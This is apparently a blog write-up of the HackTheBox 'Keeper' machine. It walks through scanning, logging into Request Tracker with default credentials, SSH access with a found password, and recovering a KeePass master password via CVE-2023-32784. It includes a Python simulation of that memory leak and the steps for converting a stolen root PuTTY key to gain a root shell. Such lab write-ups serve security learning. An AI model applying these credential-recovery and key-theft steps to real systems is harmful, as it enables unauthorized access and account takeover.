HTB — Keeper

Aakash Kumar
5 min read · Jan 20, 2024


A Linux-based box built around the CVE-2023-32784 vulnerability.

Box Preview

Box Overview:

Keeper is a Linux-based box that revolves around a Request Tracker application. It involves enumeration, moving around inside the application, and some familiarity with the KeePass client to escalate privileges. Without further ado, let's dive into the technicalities.

Enumeration:

Initiating the nmap scan to find the open ports and running services.

nmap -p- -sC -sV -T4 -A -Pn 10.10.11.227 -oA scans/tcp_scans 

Output of Nmap scan:

PORT      STATE    SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 35:39:d4:39:40:4b:1f:61:86:dd:7c:37:bb:4b:98:9e (ECDSA)
|_ 256 1a:e9:72:be:8b:b1:05:d5:ef:fe:dd:80:d8:ef:c0:66 (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: nginx/1.18.0 (Ubuntu)
19798/tcp filtered unknown
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).

Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 110/tcp)
HOP RTT ADDRESS
1 285.31 ms 10.10.14.1
2 285.47 ms 10.10.11.227

Short notes derived from the above result:

  • 22/tcp is open and running OpenSSH 8.9p1. This version of OpenSSH is not associated with any major vulnerability that would give us remote code execution or at least an initial foothold.
  • 80/tcp is open and running nginx 1.18.0, which on its own does not provide an obvious path forward.

Since this machine has port 80 open, let's visit this in the browser.

Browsing Port 80

The website does not load properly and asks us to visit tickets.keeper.htb, so we need to add this host to our system's /etc/hosts file.

Hosts File

After adding the hosts to the /etc/hosts file, let's visit the tickets.keeper.htb domain.

Login Page

After some research on this Request Tracker application, we found its default credentials, root:password, and they worked.

Logged In as root user

Now we need to move around the application to get familiar with it. In doing so, we learned that there are other users too.

Selecting Users

We found that there are two users, root and lnorgaard.

Found New User

We got the credentials of lnorgaard user by clicking on its username.

lnorgaard user credentials

Since we have another user's credentials, let's try to log in via SSH using lnorgaard:Welcome2023!

Logged in via SSH as lnorgaard

We got the shell with low privileges. Now we can read the user flag.

User Flag

To escalate privileges, we will use the RT30000.zip file. To do that, we will transfer this file to our attacking machine and then perform further operations on it.

Taking RT30000.zip on our attacking machine

On extracting the zip file, we got the following two files.

Extracted Files

As I mentioned at the beginning of the article, this box is related to CVE-2023-32784. After reading about it, I got an idea of how to exploit this vulnerability.

Exploitation:

To exploit the above vulnerability, we transferred the extracted files to our Windows machine. First, we download this GitHub repository (the KeePass dumper) on the Windows machine and then put the KeePassDumpFull.dmp file in the same directory.

KeePass Dumper Github Repo

Now, we will attempt to retrieve the password from this dump file.

Note: To execute the dotnet run command you will need to install .NET on your Windows machine.

Initiating Dotnet Run Command

This may take a while to produce the final output. After some time, the final output is as follows:

Master Password

We got a strange-looking string. After some research we found that it is the name of a Danish dessert, and that the correct spelling is rødgrød med fløde, which is Danish for "red porridge with cream".
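The string looks odd because of how CVE-2023-32784 leaks the master password: for every character typed after the first, a vulnerable KeePass 2.x (before 2.54) leaves a string of masking bullets followed by that character in memory, so the first character is never recovered and noisy positions can yield more than one candidate. The following added example (not the dumper tool used above, nor KeePass code) simulates that pattern in a constructed byte buffer and reconstructs the candidate string; the decoy fragment and filler bytes are constructed for illustration.

```python
# Added example (not the write-up's dumper tool or KeePass code): simulates
# the CVE-2023-32784 leak in a constructed memory image and recovers it.
BULLET = "\u25cf"                       # masking char drawn by SecureTextBoxEx
BULLET_LE = BULLET.encode("utf-16-le")  # b"\xcf\x25" inside a .NET string

def leaked_strings(password: str) -> list[bytes]:
    """Leftover UTF-16LE strings a vulnerable KeePass 2.x (< 2.54) keeps in
    memory: for the n-th typed character (n >= 2), n-1 bullets + that char.
    The first character never gets a bullet prefix, so it is not recoverable."""
    return [(BULLET * i + password[i]).encode("utf-16-le")
            for i in range(1, len(password))]

def build_dump(password: str, decoys: list[str]) -> bytes:
    """Constructed stand-in for a process dump: leaked strings plus decoy
    fragments, separated by filler bytes (no real memory is touched)."""
    filler = b"\x00" * 8 + b"heap-filler" + b"\x00" * 8
    parts = leaked_strings(password) + [d.encode("utf-16-le") for d in decoys]
    return filler + filler.join(parts) + filler

def recover_candidates(dump: bytes) -> dict[int, set[str]]:
    """Scan for runs of bullets followed by one character and group that
    character by run length + 1, i.e. its 1-based position in the password."""
    found: dict[int, set[str]] = {}
    i = 0
    while i + 1 < len(dump):
        run, j = 0, i
        while dump[j:j + 2] == BULLET_LE:
            run, j = run + 1, j + 2
        if run == 0:
            i += 1
            continue
        ch = dump[j:j + 2].decode("utf-16-le", errors="replace")
        if ch.isprintable() and ch != "\ufffd":
            found.setdefault(run + 1, set()).add(ch)
        i = j + 2          # skip past the character we just consumed
    return found

def reconstruct(found: dict[int, set[str]]) -> str:
    """Best guess: '?' for the never-leaked first character, {a|b} where the
    dump holds conflicting candidates for the same position."""
    out = ["?"]
    for pos in range(2, max(found, default=1) + 1):
        chars = sorted(found.get(pos, ()))
        out.append(chars[0] if len(chars) == 1 else
                   "{" + "|".join(chars) + "}" if chars else "?")
    return "".join(out)

PASSWORD = "rødgrød med fløde"                      # master password from the box
DUMP = build_dump(PASSWORD, [BULLET + "\u00d8"])    # constructed decoy: 2nd char conflict

if __name__ == "__main__":
    print(reconstruct(recover_candidates(DUMP)))    # ?{Ø|ø}dgrød med fløde
```

The missing first character and the ambiguous second position are exactly why the dumper's output has to be "cleaned up" by guessing the real word, as done above.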

Now we need to install the KeePass client on our Windows machine and then open the passcoded.kdbx file in it.

Asking for the master password

Now we will use rødgrød med fløde as our master password.

KeePass Database

Now we will copy the content stored in the root user's entry and save it to a key.ppk file.

key.ppk File

We will now convert this .ppk key to id_rsa using the following command.

puttygen key.ppk -O private-openssh -o id_rsa

Setting the permission of id_rsa to 600.

chmod 600 id_rsa

Our root user's private SSH key is ready. Let's try to log in as the root user using this SSH key.

Root Shell

Finally, we got the root shell and read the root flag.
